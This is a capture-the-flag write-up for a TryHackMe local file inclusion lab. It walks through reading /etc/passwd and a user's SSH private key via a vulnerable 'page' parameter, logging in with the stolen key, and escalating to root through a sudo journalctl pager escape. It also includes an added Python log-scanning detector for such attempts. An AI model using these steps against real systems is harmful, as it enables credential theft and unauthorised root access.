TryHackMe: LFI

ratiros01
Jul 6, 2020


[Task 1] Deploy

Port scan

nmap -Pn <ip>

There are 2 open ports: 22 (SSH) and 80 (HTTP).

[Task 2] Getting user access via LFI

1. Look around the website. What is the name of the parameter you found on the website?

After exploring the site, I found the “page” parameter.

2–3. Once we find the vulnerable parameter, we can try to include the passwd file on the Linux system, i.e. /etc/passwd.

Check the bottom of the site. Here’s the result.

View the page source: there are 2 users, root and falcon.

4. What is the name of the user on the system?
ANS: It’s in #2–3.

5. Once you find the name of the user, it’s important to see if you can include anything common and important in that user’s directory; it could be anything like their .bashrc, etc.

6. Name of the file which can give you access to falcon’s account on the system?

I tried to check if I could use a log poisoning exploit first.

I will put this file request in the parameter.

/var/log/apache2/access.log

Failed!!!

Seems like I have to do the directory traversal instead.

Remember from Task 1 that port 22 is open with an SSH service. This user “falcon” might have a private key file in his directory.

The file will be “id_rsa”, stored in “/home/falcon/.ssh”.

Let’s find it.

Here’s the result.

Copy it and save as “id_rsa”.
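As an added example (not from the original writeup), here is a small log triage script that flags requests whose `page` parameter carries a traversal sequence or a sensitive file path, run over constructed Apache access log lines modelled on the requests made above. The sample lines and the `find_lfi_attempts` helper are assumptions of this example, not part of the room.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample Apache access log lines (not real traffic from the room).
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jul/2020:10:01:02 +0000] "GET /?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Jul/2020:10:01:10 +0000] "GET /?page=/etc/passwd HTTP/1.1" 200 1203 "-" "curl/7.68.0"
10.0.0.9 - - [06/Jul/2020:10:01:15 +0000] "GET /?page=/var/log/apache2/access.log HTTP/1.1" 200 0 "-" "curl/7.68.0"
10.0.0.9 - - [06/Jul/2020:10:01:20 +0000] "GET /?page=..%2F..%2F..%2Fhome%2Ffalcon%2F.ssh%2Fid_rsa HTTP/1.1" 200 1675 "-" "curl/7.68.0"
10.0.0.7 - - [06/Jul/2020:10:02:00 +0000] "GET /?page=about HTTP/1.1" 200 498 "-" "Mozilla/5.0"
"""

# Minimal parser for the start of an Apache combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Patterns that a legitimate value of an include parameter should never contain.
TRAVERSAL = re.compile(r'(\.\./|\.\.\\|\.\.%2f|%2e%2e)', re.IGNORECASE)
SENSITIVE = re.compile(r'(/etc/passwd|/etc/shadow|/\.ssh/|id_rsa|/var/log/|/proc/self)', re.IGNORECASE)

def find_lfi_attempts(log_text, param="page"):
    """Return one record per request whose `param` value looks like an LFI attempt."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m["path"]).query)  # parse_qs URL-decodes once
        for raw in qs.get(param, []):
            value = unquote(raw)  # second decode catches double-encoded traversal
            reasons = []
            if TRAVERSAL.search(raw) or TRAVERSAL.search(value):
                reasons.append("traversal")
            if SENSITIVE.search(value):
                reasons.append("sensitive-path")
            if value.startswith("/"):
                reasons.append("absolute-path")
            if reasons:
                hits.append({"ip": m["ip"], "ts": m["ts"], "value": value,
                             "status": int(m["status"]), "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(hit["ip"], hit["ts"], hit["value"], ",".join(hit["reasons"]))
```

A status of 200 on a flagged request (as in the sample lines) is the signal that the include actually succeeded and the host needs attention, not just the source IP.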

7. What is the user flag?

Change the “id_rsa” permissions first:

chmod 600 id_rsa

Log in via SSH:

ssh -i id_rsa falcon@<ip>
ls
cat user.txt

[Task 3] Escalating your privileges to root

1. What can falcon run as root?

sudo -l

I can use “journalctl” to escalate my privilege.

2. Search GTFOBins.

3. What is the root flag?

sudo journalctl
!/bin/sh
id

journalctl shows its output through the less pager, and the “!” escape in less runs a command, which is what gives the root shell here.

Now I’m root.

Let’s get the root flag:

cd /root
ls
cat root.txt
